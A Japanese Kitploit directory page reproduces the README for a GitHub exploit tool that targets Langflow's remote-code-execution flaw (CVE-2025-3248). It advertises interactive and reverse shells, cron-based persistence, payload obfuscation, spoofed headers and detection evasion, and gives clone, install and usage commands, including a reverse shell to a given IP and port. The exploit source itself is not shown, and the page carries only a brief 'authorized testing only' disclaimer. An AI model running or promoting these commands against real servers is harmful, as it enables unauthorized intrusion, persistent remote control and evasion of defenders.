Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/0-d3y/langflow-rce-exploit
特権昇格永続化メカニズム脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツールペイロード開発
7151年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
0-d3y/langflow-rce-exploit

langflow-rce-exploit

Langflow用リモートコード実行エクスプロイト (CVE-2025-3248) - [ S4Tech作 ]

リポジトリを見る

Langflow RCE エクスプロイト (CVE-2025-3248)

Python Version License Platform

Langflow 向けリモートコード実行エクスプロイト (CVE-2025-3248)

特徴

  • 自動脆弱性検出
  • 複数のエクスプロイトモード:
    • 対話型シェル
    • 単一コマンド実行
    • リバースシェル接続
  • ファイルアップロード機能
  • カラー化されたユーザーインターフェース
  • 複数のリバースシェル手法
  • コマンド履歴の永続化

📌 変更履歴 (v2.0)

✨ 新機能:

  • 高度なペイロードシステム(5つの実行方法)
  • ファイルアップロード/ダウンロード(Base64エンコーディング対応)
  • 持続性:cronジョブによる永続化(persistコマンド)
  • 対話型シェルの強化:
    • upload local_path remote_path
    • download remote_path local_path
    • clear コマンド(端末クリア)

🛡️ セキュリティ強化:

  • 自動ペイロード難読化(Base64 + ランダムバリアント)
  • リクエストごとのヘッダーローテーション:
    • ランダムな User-Agent
    • 偽装された X-Forwarded-For IP
  • HTTPSバイパス(自己署名証明書対応)
  • リダイレクトなし(検出回避)

⚡ 技術的改善:

  • マルチステージ脆弱性検証
  • 不安定な接続に対するエラーハンドリング強化
  • セッションログの完全出力(exploit_log.txt)
  • コマンド履歴の永続化(.langflow_shell_history)

📊 バージョン比較:

🐛 バグ修正:

  • HTTPS接続の問題を修正
  • コマンド内の特殊文字の処理を改善
  • リバースシェルの信頼性を安定化

必要条件

  • Python 3.6 以上
  • 必要なライブラリ:
    • requests
    • colorama
    • readline

インストール

root@kitploit:~
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

使い方

root@kitploit:~
python exploit.py <URL> [options]

利用可能なオプション:

使用例:

  1. 脆弱性の確認:
root@kitploit:~
python exploit.py http://target.com
  1. 対話型シェルの開始:
root@kitploit:~
python exploit.py http://target.com --shell
  1. 単一コマンドの実行:
root@kitploit:~
python exploit.py http://target.com --command "whoami"
  1. リバースシェルの起動:
root@kitploit:~
python exploit.py http://target.com --reverse 192.168.1.100 4444

スクリーンショット

Image.png)

警告

⚠️ このツールは教育目的および許可されたテスト目的のみで使用してください。
⚠️ 自分が所有していない、またはテスト許可を得ていないシステムに対する不正使用は違法です。

ライセンス

このプロジェクトはMITライセンスの下で提供されています。詳細は LICENSE ファイルを参照してください。

作者

  • Mr.SaMi
    Twitter
    Instagram

貢献

プルリクエストは歓迎します。大きな変更を行う場合は、まずIssueを開いて変更内容について議論してください。

ツールをダウンロード
機能v1.0v2.0
ペイロード手法15
ファイル転送❌ 非対応✅ 対応
持続性❌✅
ステルスレベル基本高度
セッションログ❌✅
オプション説明
--shell対話型シェルを開始
--reverse IP PORT指定されたIP:PORTにリバースシェルを送信
--command CMD単一コマンドを実行
--verbose詳細出力を有効化
--timeout SECリクエストタイムアウトを設定(デフォルト: 10秒)